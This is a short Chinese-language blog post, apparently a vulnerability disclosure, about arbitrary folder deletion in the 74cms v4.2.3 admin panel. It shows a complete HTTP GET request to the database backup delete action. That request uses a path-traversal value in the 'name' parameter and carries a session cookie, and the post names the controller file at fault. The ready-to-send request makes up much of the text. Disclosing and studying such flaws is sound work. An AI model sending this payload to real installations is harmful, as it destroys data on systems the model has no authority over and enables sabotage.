74cms v4.2.3 任意文件夹删除

in 分享 with 0 comment

概述

后台删除备份文件时传入name参数可控 导致可任意文件夹删除。

漏洞复现

GET /74cms/index.php?m=admin&c=database&a=del&name=/../../../../test/ HTTP/1.1
Host: 192.161.15.5
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Edg/80.0.361.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.161.15.5/74cms/index.php?m=admin&c=index&a=top_menu
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: think_template=default; PHPSESSID=aen9s0rkucruqsbbtrvph8hjs0; think_language=zh-CN
Connection: close

形成原理

/Application/Admin/Controller/DatabaseController.class.php

删除备份文件时传入name参数可控,导致可任意文件夹删除。

1.Comments are closed.
2.Non Chinese browsers are not supported.